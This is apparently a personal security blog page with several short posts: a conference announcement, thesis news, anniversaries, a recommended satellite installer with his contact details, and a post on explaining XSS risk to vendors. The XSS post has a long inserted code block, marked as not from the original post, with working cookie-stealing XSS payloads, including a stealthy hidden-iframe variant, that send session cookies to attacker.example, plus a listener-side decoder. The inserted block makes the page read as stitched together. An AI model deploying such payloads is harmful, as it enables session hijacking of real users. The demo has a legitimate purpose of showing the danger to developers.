Definitely worth a read for those of you that think Ubuntu is a Linux distribution.
tcpdump -i eth0 > /dev/audio
Awesome! Credit to zeroday and sound of traffic project.
There is something very big going on in the security world. It is rare to see things pushed forward quite this fast. I'm talking about the latest advances in web application security. I'm calling it Web Hacking 2.0 (gettit?).
Continue reading "Web Hacking 2.0 - This is BIG"
ITWeb will be holding their 2007 Security Summit. The keynotes are Bruce Schneier and Phil Zimmerman. The best part is, three of our abstracts were accepted. Nithen, Yusuf and Johann will be presenting.
I sat up one night trying to figure out what I would say to Schneier. He is one of the reasons I got into security as a job. I remember having just finished my honours degree (our first postgrad degree before a Masters) and reading Secrets and Lies. It made me realise I could turn my hobby into a job. How does one meet a 'celebrity' and not come across as a gushing teen ready to part with her bra? I don't know, but I am going to try hard to take him out to dinner.
So, if you will be near SA, or are prepared to fly here, come to the ITWeb Security Summit to watch us present :)
This week I was reviewing a security product and discovered a rather serious XSS in their web console. When I highlighted this to the product's technical team, they claimed it was a vulnerability in IIS and not their product. It was rather silly of them to claim that outputting JavaScript was the fault of the web server. However, it did highlight two interesting facts about XSS to me: an alert box displaying 'XSS' or unintelligible session details means very little to many people who should know better, and you need to have a canned, high-level explanation of what the dangers of an XSS really are.
A quick and easy demo, which I put here mostly for my own memory, is to just change the window location to point to a machine where you have set up a netcat listener, with the session details and URL appended to the request. If you want to be stealthy, you can use a hidden iframe.
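The demo described above, written out as an added example (this is not code from the original post): both the payload side that a reflected XSS would inject, in the noisy window-redirect form and the stealthy hidden-iframe form, and the listener side that turns the raw request line seen on a netcat listener back into the session cookie and page URL. The listener address `attacker.example:8080`, the parameter names `c` and `u`, and the sample cookie and page URL are assumptions for illustration only; in a live demo `document.cookie` and `location.href` supply the real values.

```javascript
// Added example, not code from the original post. The listener address and
// parameter names below are assumptions, as are the sample cookie and page URL.

// Build the URL the victim's browser will request. Cookie and page URL are
// percent-encoded: a raw cookie contains ';' and '=' (and may contain '&'),
// which would otherwise corrupt the query string on the listener side.
function buildExfilUrl(listener, cookie, pageUrl) {
  const u = new URL('http://' + listener + '/');
  u.searchParams.set('c', cookie);
  u.searchParams.set('u', pageUrl);
  return u.toString();
}

// Noisy variant: send the whole window to the listener. Obvious to the victim,
// but unmistakable when you are demonstrating the issue to a product team.
function redirectPayload(listener) {
  return '<script>window.location="http://' + listener + '/?c="' +
    '+encodeURIComponent(document.cookie)+"&u="+encodeURIComponent(location.href)' +
    '</script>';
}

// Stealthy variant: a hidden iframe makes the same request while the page the
// victim is looking at stays exactly where it was.
function iframePayload(listener) {
  return '<script>var f=document.createElement("iframe");' +
    'f.style.display="none";' +
    'f.src="http://' + listener + '/?c="+encodeURIComponent(document.cookie)+' +
    '"&u="+encodeURIComponent(location.href);' +
    'document.body.appendChild(f)</script>';
}

// Listener side. With `nc -l -p 8080` on the listener host you see the raw
// request line, e.g.
//   GET /?c=ASP.NET_SessionId%3Dabc123%3B+role%3Dadmin&u=http%3A%2F%2F... HTTP/1.1
// Decode it back into something a non-specialist can read: the live session
// cookie and the page it was stolen from. Returns null for anything that is
// not a GET request line.
function parseRequestLine(line) {
  const m = /^GET\s+(\S+)\s+HTTP\/1\.[01]\s*$/.exec(line);
  if (!m) return null;
  const u = new URL(m[1], 'http://listener.invalid');
  return { cookie: u.searchParams.get('c'), pageUrl: u.searchParams.get('u') };
}

// Constructed sample data standing in for document.cookie and location.href.
const LISTENER = 'attacker.example:8080';
const SAMPLE_COOKIE = 'ASP.NET_SessionId=abc123; role=admin';
const SAMPLE_PAGE = 'http://console.example/admin.aspx?user=5&tab=logs';

// End to end: what the payload sends, then what the listener reads back.
function demo() {
  const sent = new URL(buildExfilUrl(LISTENER, SAMPLE_COOKIE, SAMPLE_PAGE));
  return parseRequestLine('GET ' + sent.pathname + sent.search + ' HTTP/1.1');
}

console.log(redirectPayload(LISTENER));
console.log(iframePayload(LISTENER));
console.log(demo());
```

The point of the round trip is that the listener prints something a product manager understands: "here is your admin session identifier, captured from your admin page, on a machine I control", rather than an alert box that says 'XSS'.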
The quick summary is - if you need to have any work done on your DSTV / Multichoice installation, phone this guy:
Marcus
Supreme Electronics
Cell: 072 388 5660
Fax no: 086 651 9204
E-Mail: marcusp -<at>- telkomsa.net
Continue reading "The Best DSTV/Multichoice Installer EVAR!"
With the help of Jason, my thesis has undergone some major grammar surgery. The new version is available at the usual place. There have been over 32K worth of changes since I received the commentary back from the examiners. If you're interested in patch management, take a read.
The beginning of February has a few anniversaries; today marks the third birthday of my blog, and last week marked the first birthday of my job. And so I thought it would be a good time to talk about the last year.
The very short summary is that it has been a wonderful year in all aspects of my life. If you are interested in the rest of it, read on (Hi Mom).
Continue reading "Blogaversary III and the Year in Review"
RSnake has put up a really great write-up entitled, Death by a 1000 cuts. It describes how a series of minor security issues can be combined to form a very serious attack.
I spent most of my time dealing with security operational issues, where sometimes these sorts of minor issues are where I have to make concessions to get the big stuff done. I think this is a really great example that we security people need to take to developers and IT operational staff to show them why defense-in-depth is necessary.
Continue reading "A Case Study for Defense in Depth"
Microsoft will be distributing earphones as a patch to the latest vulnerability in Vista. This vulnerability is highly critical and allows remote command execution, as long as 'remote' is the same as 'within hearing range'. Ha ha.
Today marks my first workaversary. I am celebrating the completion of my first year in the working world and at my company. It has been incredible, but I'm way too tired to say much about it. I felt I had to say something though. I'll save the long post for my third blogaversary.